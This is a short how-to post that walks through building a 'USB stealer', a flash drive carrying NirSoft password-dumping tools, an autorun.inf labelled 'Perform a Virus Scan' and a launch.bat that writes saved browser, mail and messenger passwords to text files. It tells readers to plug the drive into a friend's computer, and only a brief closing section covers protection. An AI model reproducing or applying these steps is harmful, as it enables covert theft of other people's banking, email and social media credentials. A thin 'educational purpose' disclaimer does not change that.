Follow the tips to make USB stealer & steal password through USB.
Most of the people have a lack of time to enter the password again and again in websites like Banking, Facebook, Gmail, Yahoo, etc. So they are store username name and password in the browser's storage.For steal this details from browser there are lots of tools available in the market. you can also create USB Stealer by following below steps.
But the browser storage is not a safe place for store important passwords. Because of there are lots of tools are available for a steal this details from the browser. For steal this details you can create USB Stealer by following below steps.
This Guide is only for educational purpose. Use these tools at your own risk!
Tools You Need
Download Below 6 Tools From NirSoft.net
1. Mail Passview
2. MessenPass
3. IE Passview
4. Protected Storage Passviewer
5. Password Fox
6. ChromePass
2. MessenPass
3. IE Passview
4. Protected Storage Passviewer
5. Password Fox
6. ChromePass
- After downloading all tools you need to extract it and copy all .exe file & past it to USB Drive.
- Create a new notepad file and save as “autorun.inf”. In this file write the below code.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
- Transfer this “autorun.inf” file to USB Drive.
- Now Create another notepad file save as “launch.bat”. In this file write below code.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
start chromepass.ext / stext chromepass.txt
- Also, transfer this "launch.bat" file to USB Drive.
- That's it your USB Stealer is Created.
If Autorun is disabled in laptop or pc then first you need to enable it. If this feature is disabled then you not able to steal the password.
For Windows XP and Vista: Insert this USB Stealer in your friend's computer and you need to run "launch.bat" file. After that, the password saved in .TXT files in your USB Stealer Drive. (If the pop windows appear to click on launch virus scan option).
For Windows 7 and Above: If you are using windows 7 or above then you need to open each .exe file one by one to store the username and password in .TXT file.
How To Protect From USB Stealer Attact
- If your computer or laptop has autorun enabled then disable it now for protect from USB stealer attact.
- Don't allow your browser to remember your important passwords like Banking, social media and other.
- For store password, you can use password managers with encryption features like LastPass.
- Always use two-factor authentication for login.
- Never share your laptop with anyone else, especially who's using a USB flash drive.
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